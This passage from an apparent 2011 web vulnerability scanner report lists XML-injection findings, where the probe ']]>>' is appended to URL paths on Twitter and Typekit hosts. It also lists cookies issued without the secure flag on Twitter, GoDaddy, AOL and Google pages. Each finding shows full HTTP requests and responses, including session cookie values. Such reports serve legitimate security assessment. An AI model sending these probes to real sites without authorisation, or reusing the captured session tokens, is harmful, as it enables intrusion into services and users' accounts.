9.8. http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform2.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/tweet_button.html?_=1304575123517&count=horizontal&counturl=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmerchantcircle-debuts-iphone-app-for-small-businesses-to-manage-marketing%2F&lang=en&related=leenarao%3AAuthor%20of%20the%20post&text=MerchantCircle%20Debuts%20iPhone%20App%20For%20Small%20Businesses%20To%20Manage%C2%A0Marketing&url=http%3A%2F%2Ftcrn.ch%2FlTiWaS&via=techcrunch HTTP/1.1
Host: platform2.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Thu, 05 May 2011 01:23:37 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/tweet_button.html</Key><RequestId>09FFDC161539EB6F</Reque
...[SNIP]...

9.9. http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform2.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/tweet_button.html]]>>?_=1304575123517&count=horizontal&counturl=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmerchantcircle-debuts-iphone-app-for-small-businesses-to-manage-marketing%2F&lang=en&related=leenarao%3AAuthor%20of%20the%20post&text=MerchantCircle%20Debuts%20iPhone%20App%20For%20Small%20Businesses%20To%20Manage%C2%A0Marketing&url=http%3A%2F%2Ftcrn.ch%2FlTiWaS&via=techcrunch HTTP/1.1
Host: platform2.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Thu, 05 May 2011 01:23:39 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]&gt;&gt;</Key><RequestId>51F25A83325C58D1</Reque
...[SNIP]...

9.10. http://use.typekit.com/p/uni0vle.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://use.typekit.com
Path:   /p/uni0vle.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /p]]>>/uni0vle.js?1304575102706 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=300
Content-Type: text/html
Date: Thu, 05 May 2011 01:18:56 GMT
Expires: Thu, 05 May 2011 01:23:56 GMT
Server: EOS (lax001/54D7)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.11. http://use.typekit.com/p/uni0vle.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://use.typekit.com
Path:   /p/uni0vle.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /p/uni0vle.js]]>>?1304575102706 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=300
Content-Type: text/html
Date: Thu, 05 May 2011 01:19:05 GMT
Expires: Thu, 05 May 2011 01:24:05 GMT
Server: EOS (lax001/54D6)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10. SSL cookie without secure flag set
There are 29 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


10.1. https://twitter.com/signup

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://twitter.com
Path:   /signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup?follow=saritaa_raqueel&context=profile HTTP/1.1
Host: twitter.com
Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; k=173.193.214.243.1304470443436909; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCRYvlAWfzUdGijPb%2B6ja82xN%2BH8W6aFgHQSpuNVLdmBU0LhnFMWTHe5IHHaiGlrUFWFz73h0a1oGmrHXt6T4cZhn%2B5tDCDw941cPbbLYne7DEIX6oFRVcro6%2FBLBhhmFWQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; __utmb=43838368.7.10.1304617828

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:51:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304599877-64646-36898
ETag: "06f262ea632c8d98b47e6b792a37a509"-gzip
Last-Modified: Thu, 05 May 2011 12:51:17 GMT
X-Runtime: 0.11675
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 67e0037d977aac500cebe3d2cd3c91e1c1ab51c2
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 45875

<!DOCTYPE html>
<html lang="">
<head>
<title>Twitter / Create an Account</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<script type="text/javascript" ch
...[SNIP]...

10.2. https://www.fightmagazine.com/mma-magazine/subscribe.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fightmagazine.com
Path:   /mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

10.3. https://www.godaddy.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.4. https://www.godaddy.com/domains/search.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.5. https://account.login.aol.com/_cqr/opr/opr.psp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.login.aol.com
Path:   /_cqr/opr/opr.psp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_cqr/opr/opr.psp?sitedomain=bill.aol.com&authLev=S&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp&lang=en&locale=us HTTP/1.1
Host: account.login.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617350589-Repeat%7C1367689350589%3B%20s_nrgvo%3DRepeat%7C1367689350591%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:35 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=" "; Domain=account.login.aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgVHI2THpNVUtRVzlueFJYQVVaU01OSkNDWG5RPQ%3D%3D-NcFbxVvZ3cGQxGlfmjBVPVkJW64%2BeBxWJqQTawIkTLE5BKUhKD6jK%2BDOwZYGCPdVZtVKmX%2BwbWrRDwLObZcV8YEfzzgBFtHkpa%2Fro2ZZ0ZA%3D; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 9977


<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...

10.6. https://aolproductcentral.aol.com/ClickBroker

Summary

Severity:   Information
Confidence:   Certain
Host:   https://aolproductcentral.aol.com
Path:   /ClickBroker

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ClickBroker HTTP/1.1
Host: aolproductcentral.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 10:52:20 GMT
Set-Cookie: JSESSIONID=9985EAD08E4D785B6C549D405DE9BA1A.storefrontus-m01a; Path=/; Secure
Set-Cookie: OFBiz.Visitor=2833631; Expires=Fri, 04-May-2012 10:52:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 21413
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Begin Screen component://gps/widget/gpsScreens.xml#product -->
<!-- Beg
...[SNIP]...

10.7. https://bill.aol.com/SPortal/jsp/main.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bill.aol.com
Path:   /SPortal/jsp/main.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SPortal/jsp/main.jsp HTTP/1.1
Host: bill.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 12:41:55 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8q DAV/2 mod_jk/1.2.28 mod_rsp20/rsp_plugins_v16_r2.09-06-29:mod_rsp2.2.so.rhe-5-x86.v16_r2.1
Set-Cookie: RSP_LOCAL_BILL.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=bill.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=bill.aol.com&authLev=S&lang=en&locale=us&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp
Content-Length: 388
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

10.8. https://bill.aol.com/SPortal/jsp/notify_about_notify.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bill.aol.com
Path:   /SPortal/jsp/notify_about_notify.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SPortal/jsp/notify_about_notify.jsp HTTP/1.1
Host: bill.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 12:42:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8q DAV/2 mod_jk/1.2.28 mod_rsp20/rsp_plugins_v16_r2.09-06-29:mod_rsp2.2.so.rhe-5-x86.v16_r2.1
Set-Cookie: RSP_LOCAL_BILL.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=bill.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=bill.aol.com&authLev=2&lang=en&locale=us&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fnotify_about_notify.jsp
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

10.9. https://maps-api-ssl.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=916aad4fa2d46b54:TM=1304592793:LM=1304592793:S=ngvj94qxaaorD5lW; expires=Sat, 04-May-2013 10:53:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

10.10. https://my.screenname.aol.com/_cqr/login/checkStatus.psp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/checkStatus.psp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_cqr/login/checkStatus.psp HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:42 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:42 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 23
Connection: close


_sns_isLoggedIn=0;


10.11. https://my.screenname.aol.com/_cqr/login/jslogin.psp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/jslogin.psp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_cqr/login/jslogin.psp HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
